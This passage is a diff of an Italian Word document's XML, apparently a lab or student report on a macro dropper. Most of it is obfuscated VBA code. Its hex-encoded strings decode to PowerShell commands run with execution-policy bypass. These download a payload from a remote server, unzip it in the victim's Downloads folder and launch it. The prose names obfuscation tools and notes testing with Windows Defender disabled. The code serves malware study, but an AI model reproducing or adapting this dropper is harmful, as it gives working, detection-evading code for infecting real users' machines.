-      <w:r>
-        <w:t xml:space="preserve"> As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Dim </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gcgrrlkyyn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Dim </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hbwgdnzhgeyo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Dim </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ajkquovldiyoumav</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Dim </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vmfosuiwtjww</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Dim </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tzicbtrtaod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> As Object</w:t>
+        <w:t>ddvsalsbhsamkq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = rlhlektfjszistm("494558285b53797374656d2e546578742e456e636f64696e675d3a3a555446382e476574537472696e67285b53797374656d2e436f6e766572745d3a3a46726f6d426173653634537472696e67282742") &amp; rlhlektfjszistm("41534536345f454e434f4445445f434f4d4d414e4427292929")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>eavmyimjn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ddvsalsbhsamkq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>rlhlektfjszistm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("4241534536345f454e434f4445") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>rlhlektfjszistm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>("445f434f4d4d414e44"), rlhlektfjszistm("4b45356c64793150596d706c59335167546d56304c6c646c596b4e736157567564436b7552473933626d7876595752476157786c4b43646f644852774f6938764d546b794c6a45324f4334784c6a45774f6a") &amp; rlhlektfjszistm("67774d44417663474635624739685a4335366158416e4c43416e517a706356584e6c636e4e6359334a706333526352473933626d78765957527a584842686557787659575175656d6c774a796b3d"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>dsffuvx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ddvsalsbhsamkq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>rlhlektfjszistm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("4241534536345f454e434f4445") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>rlhlektfjszistm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("445f434f4d4d414e44"), rlhlektfjszistm("494359674a304d365846567a5a584a7a58474e7961584e3058455276643235736232466b6331787759586c736232466b4c6d56345a") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>rlhlektfjszistm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>("53633d"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>dbrdnepriwzak.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>rlhlektfjszistm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("706f7765727368656c6c2e65786520") &amp; rlhlektfjszistm("2d4e6f50726f66696c65202d457865637574696f6e506f6c69637920427970617373202d436f6d6d616e6420") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>eavmyimjn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ijuxigpwgeu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Call </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>mbfxexlevptgj</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>dbrdnepriwzak.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> rlhlektfjszistm("706f7765727368656c6c2e657865202d4e6f50726f66696c65202d457865637574696f6e506f6c6963792042797061737320") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>rlhlektfjszistm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("2d436f6d6d616e6420") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>dsffuvx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ijuxigpwgeu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>, True</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1972,418 +2638,139 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>tzicbtrtaod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>VBA.CreateObject</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>twnukwpmlvzmxls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">"57536372") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>twnukwpmlvzmxls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>("6970742e5368656c6c"))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>hbwgdnzhgeyo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = twnukwpmlvzmxls("494558285b53797374656d2e546578742e456e636f64696e675d3a3a555446382e476574537472696e67285b53797374656d2e436f6e766572745d3a3a46726f6d426173653634") &amp; twnukwpmlvzmxls("537472696e6728274241534536345f454e434f4445445f434f4d4d414e4427292929")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>ajkquovldiyoumav</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Replace</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>hbwgdnzhgeyo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>twnukwpmlvzmxls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("4241534536345f") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>twnukwpmlvzmxls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("454e434f4445445f434f4d4d414e44"), </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>twnukwpmlvzmxls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>("4b45") &amp; twnukwpmlvzmxls("356c64793150596d706c59335167546d56304c6c646c596b4e736157567564436b7552473933626d7876595752476157786c4b43646f644852774f6938764d546b794c6a45324f4334784c6a45774f6a67774d44417663474635624739685a43356c6547556e4c43416e517a706356584e6c636e4e6359334a706333526352473933626d78765957527a58485a70636e567a4c6d56345a536370"))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>vmfosuiwtjww</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Replace</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>hbwgdnzhgeyo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>twnukwpmlvzmxls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("4241534536") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>twnukwpmlvzmxls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("345f454e434f4445445f434f4d4d414e44"), </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>twnukwpmlvzmxls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>("494359674a304d365846") &amp; twnukwpmlvzmxls("567a5a584a7a58474e7961584e3058455276643235736232466b6331783261584a316379356c6547556e"))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>tzicbtrtaod.Run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> twnukwpmlvzmxls("706f7765727368656c6c2e657865202d4e6f50726f66696c6520") &amp; twnukwpmlvzmxls("2d457865637574696f6e506f6c69637920427970617373202d436f6d6d616e6420") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>ajkquovldiyoumav</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>ehtsfjs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>tzicbtrtaod.Run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>twnukwpmlvzmxls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("706f77") &amp; twnukwpmlvzmxls("65727368656c6c2e657865202d4e6f50726f66696c65202d457865637574696f6e506f6c69637920427970617373202d436f6d6d616e6420") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>vmfosuiwtjww</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>ehtsfjs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titolo1"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Set </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>tzicbtrtaod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
+        <w:t>dbrdnepriwzak</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:t xml:space="preserve"> = Nothing</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
+    <w:p>
+      <w:r>
+        <w:t>End Sub</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Sub mbfxexlevptgj()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim dqetmcojrcykhkuuroj As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim tsahrpztdxvongdmsl As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim rpvwovdxuqrxdnypyft As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim rmxenvuvefwomujrm As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim unialsnhj As Variant</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Set dqetmcojrcykhkuuroj = CreateObject(rlhlektfjszistm("536372697074696e") &amp; rlhlektfjszistm("672e46696c6553797374656d4f626a656374"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>tsahrpztdxvongdmsl = rlhlektfjszistm("433a5c55736572735c63726973745c446f776e6c6f61") &amp; rlhlektfjszistm("64735c")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>rmxenvuvefwomujrm = Dir(tsahrpztdxvongdmsl, vbNormal)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>unialsnhj = tsahrpztdxvongdmsl</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Do While rmxenvuvefwomujrm &lt;&gt; ""</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
+        <w:t>If Right(rmxenvuvefwomujrm, 3) = rlhlektfjszistm("7a6970") Then</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Set rpvwovdxuqrxdnypyft = CreateObject(rlhlektfjszistm("5368656c6c2e4170706c") &amp; rlhlektfjszistm("69636174696f6e"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>rpvwovdxuqrxdnypyft.Namespace(unialsnhj).CopyHere rpvwovdxuqrxdnypyft.Namespace(tsahrpztdxvongdmsl &amp; rmxenvuvefwomujrm).Items</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>DoEvents</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>End If</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>rmxenvuvefwomujrm = Dir</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Loop</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>End Sub</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
         <w:t>Il codice è</w:t>
       </w:r>
       <w:r>
@@ -2577,7 +2964,7 @@
             <w:rStyle w:val="Collegamentoipertestuale"/>
             <w:lang w:val="it-IT"/>
           </w:rPr>
-          <w:t>https://github.com/0xb11a1/yetAnotherObfuscator.git</w:t>
+          <w:t>https://github.com/h4wkst3r/InvisibilityCloak.git</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -2590,7 +2977,13 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> L’unico possibile “comando malevolo” che ho implementato è la scrittura di un messaggio da remoto usando il prompt della vittima.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>L’unico possibile “comando malevolo” che ho implementato è la scrittura di un messaggio da remoto usando il prompt della vittima.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2638,7 +3031,31 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> con Windows Defender disabilitato e con pacchetto Office installato</w:t>
